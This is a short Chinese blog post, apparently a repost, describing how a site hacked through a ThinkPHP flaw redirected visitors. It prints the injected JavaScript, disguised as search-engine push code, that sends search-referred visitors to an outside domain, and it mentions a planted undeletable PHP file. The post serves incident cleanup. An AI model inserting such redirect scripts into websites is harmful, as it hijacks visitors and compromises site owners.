问题原由
早上突然接到客户电话,网站在微信中无法打开,被微信拦截
在pc端访问网站,点击首页中任何一个url都会跳转到第三方网站,恍然大悟,网站是被黑了
问题分析
发现网站head被加入一下代码
发现js里面代码的如下,会强制跳转到第三方网站:
(function () {/*百度推送代码*/var bp = document.createElement('script');bp.src = '//push.zhanzhang.baidu.com/push.js';var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);/*360推送代码*/var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';document.write('<script src="' + src + '" id="sozz"><\/script>');})();document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://2019d2.com\";");
document.writeln("</script>");
打开阿里云虚拟主机,ftp连接到虚拟主机,发现:
- 网站根目录多了一个文件:coonig.php,且此文件无法修改无法删除
- index.php文件被修改
解决方法
- 提交阿里云工单,让阿里云后台人员删除coonig.php文件
- 将index.php替换掉
本次被黑是由于thinkphp漏洞导致,详见
http://www.thinkphp.cn/topic/61303.html
后续
有没有小伙伴知道如何快速举报一个网站?
转载于:https://blog.51cto.com/13990437/2383267